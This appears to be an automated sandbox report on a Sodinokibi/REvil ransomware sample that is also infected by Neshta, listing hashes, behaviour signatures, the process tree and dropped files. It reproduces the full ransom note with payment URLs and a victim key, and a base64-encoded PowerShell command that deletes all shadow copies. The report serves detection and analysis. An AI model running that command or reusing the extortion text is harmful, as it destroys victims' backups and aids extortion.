Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-09-2024 00:40

General

  • Target

    f0f02bd33c34570b641fda56f5452f98_JaffaCakes118.exe

  • Size

    247KB

  • MD5

    f0f02bd33c34570b641fda56f5452f98

  • SHA1

    71090aecf0184950c934d323af59f34a2ba58248

  • SHA256

    5ef585d96c5e3b0413a90df2a01b44251f4d5759c2236ae7042f6aa211276c8b

  • SHA512

    3248a2f7299e09e76853645ae4f013eea3c59c67ba9f4b4dbaf68dfa10d75755bc98eb3af5e34e7d03965f400d74734b0084e7353819537b91724bbc68ba2a92

  • SSDEEP

    3072:sr85CIyy2RjLTuVyu7CJDgoMT3QLOoBB2W5LFrb30BRtBZZg+i2QLFrb30BRtBZ5:k9ny2RsQJ8zgLOYBFJ0BXScSJ0BXScv

Malware Config

Extracted

Path

C:\Users\ly595-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ly595. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9C88FA0303690014 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/9C88FA0303690014 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 7yOAtRCs5NvmfvSu3w0/Ls3QVFdArN8KFQ6ty3aAb3X0mNEtKHbTnYfHnbPA6eis F3hd4xvIfr0j3TChKVGrJC+YVqK49cc4pOqx7p4uVedcsB38pZzngru+Knm5LDxY 38wruL0K/iaAZwTegEjTkdCzJP18Z2bM0oR8grX0Kx5teXRr+jY/im7JIEIo/pIq q6oDjjZ7ZF73pGEDTGKu3c0kFzJ3G04BCJnfuWJJRJYt8yymfuz92o4xcbBamqsr WxBRA61FvVmX/Tm99dU0I8y7JUuYu2Fkfp5Fo+NhR33ke1uSnuyOMN+2sulQnnWx 8Mitg2AI9dicrJgH7exLZGNvRYebzwKBC/MkHBs235UAzWmZ57e6AUoqzmx4Q8NK 81/np1Dti3/qNgxABNU+skBB8g+VvllKpIpN2G5rqqAma4IhhoJgfEqNDF50hM16 hz/ZMOB9SQeP6NW3R6JQKyK2e2ww8g7XpyyTvIRpg4XboJmueiduCx0uI+LEeLdG gsA8uOSTg3T0yBsItkDnsDOwX5MHj76LAZwweNP/7znag4ITyFmyDAbia/uGxjBg 9koIvwfMVQlSpNrtwx/jANDS07NUkWRwB3Ec9zSd2TtQCa04zzPkTyXmoo5LU4Ak iRslLhg06eQjpbTmjcBCaYLoqdRJDs7BgNuBcfzXj0XMFxbfOaUAZnM7JUd5vps1 5NRy4JXcIDcI5z0eBXtJU50DVdE0+xiKCl/yqFa7iiTZ4H78OinCgM40IsWINonj yBBsjIMqRheNzz/vO7RJiLKdRLgz07U+A19ltvejB7a+THhGcTX72tWYbyHF0aJf oW4Z5qCrUXGjXuu0/U/y/GwLqYm8sroHrs/CMKCVbOwhONVRxC6uDO7jMugsKvYs BwXNzwuQkvHYfc43pLzVShEUpvYvjyBghIcy9mrd0/pR5/F0VFKqhVZPATMN87hO CGidLBK7iJCqR7tKIypRi6UUvi6pTvPQbA3LhhZCQqmkvmDjH3z7KMu8ZvbTdzL5 a7z55DQScaeSesh8nFFYu+SH7vsa++ajoG0x/y6l6G8VaHwfqJnDa8UOAnV2/mMY zgol6dxc5L4kQ9Bq1cw6unz9yPYlYuBOfFKcwNPKf4kZPj61my1Qyon9EhBe0QfS JdVKiTzMWrK8F3EkQAAFnmhR8rHWTyyCBixuMvvuyg5ufP7bNXOfFgfr0jaTNxh6 d3cXcKN3P3cUh1GcTyZPDj7fkEy2KSm8OFlxqzh0jp2yTmybpmNqrUag5kKpPE8x vmuSEaRVCuBh4AnuG21RzKCDWPaf7yInU4YUEOQT+KmLrmLS34WVo6RdC+45f+AB 8ArbKch6eYYf/U2XtKwZWlDOnR9aKPPkSfw3zRIk5QHAyynJ ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9C88FA0303690014

http://decryptor.cc/9C88FA0303690014

Signatures

  • Detect Neshta payload 4 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\f0f02bd33c34570b641fda56f5452f98_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\f0f02bd33c34570b641fda56f5452f98_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Modifies system executable filetype association
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4448
    • C:\Users\Admin\AppData\Local\Temp\3582-490\f0f02bd33c34570b641fda56f5452f98_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\f0f02bd33c34570b641fda56f5452f98_JaffaCakes118.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4420
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1768
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:4112
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2696

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE

      Filesize

      86KB

      MD5

      3b73078a714bf61d1c19ebc3afc0e454

      SHA1

      9abeabd74613a2f533e2244c9ee6f967188e4e7e

      SHA256

      ded54d1fcca07b6bff2bc3b9a1131eac29ff1f836e5d7a7c5c325ec5abe96e29

      SHA512

      75959d4e8a7649c3268b551a2a378e6d27c0bfb03d2422ebeeb67b0a3f78c079473214057518930f2d72773ce79b106fd2d78405e8e3d8883459dcbb49c163c4

    • C:\Users\Admin\AppData\Local\Temp\3582-490\f0f02bd33c34570b641fda56f5452f98_JaffaCakes118.exe

      Filesize

      207KB

      MD5

      92282d13690015ddf3c1f9bc969e7f0b

      SHA1

      87cbe493d820aaa6dc8e2310d94d54efd419c594

      SHA256

      da2aa8adfa412f7d0a6a31f9bb67efb4baf7c0d9c1164418272771e3189cd326

      SHA512

      e59330abec4ed3d9b838f58629731aaf8645285fc51b354b205616eda49fa302c69596262e2abde77d592abb7c1867774d72d27122f3225b039bdbd5920ff015

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nkxxvr1y.mki.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\ly595-readme.txt

      Filesize

      6KB

      MD5

      ef1b69639d971330e6a1b6c7c2f155eb

      SHA1

      3e048ded9586bfae0ff3d1e1f58709acf99267ec

      SHA256

      4ffffde5fe6599a2158b53474235e2d3733897cd2f168132ad9ea92a65618437

      SHA512

      65b60b1f4d8c02f5a64ae6d1b630f10381ac64b4cbef474cd05adc2f80ea11ffb1c4c36ee4213e10a15c710255ded8a90578b3ab776acc61c01415c57036b72a

    • memory/1768-93-0x00007FFE7E843000-0x00007FFE7E845000-memory.dmp

      Filesize

      8KB

    • memory/1768-94-0x00007FFE7E840000-0x00007FFE7F301000-memory.dmp

      Filesize

      10.8MB

    • memory/1768-95-0x00007FFE7E840000-0x00007FFE7F301000-memory.dmp

      Filesize

      10.8MB

    • memory/1768-101-0x00000264633B0000-0x00000264633D2000-memory.dmp

      Filesize

      136KB

    • memory/1768-108-0x00007FFE7E840000-0x00007FFE7F301000-memory.dmp

      Filesize

      10.8MB

    • memory/4448-592-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/4448-593-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/4448-595-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB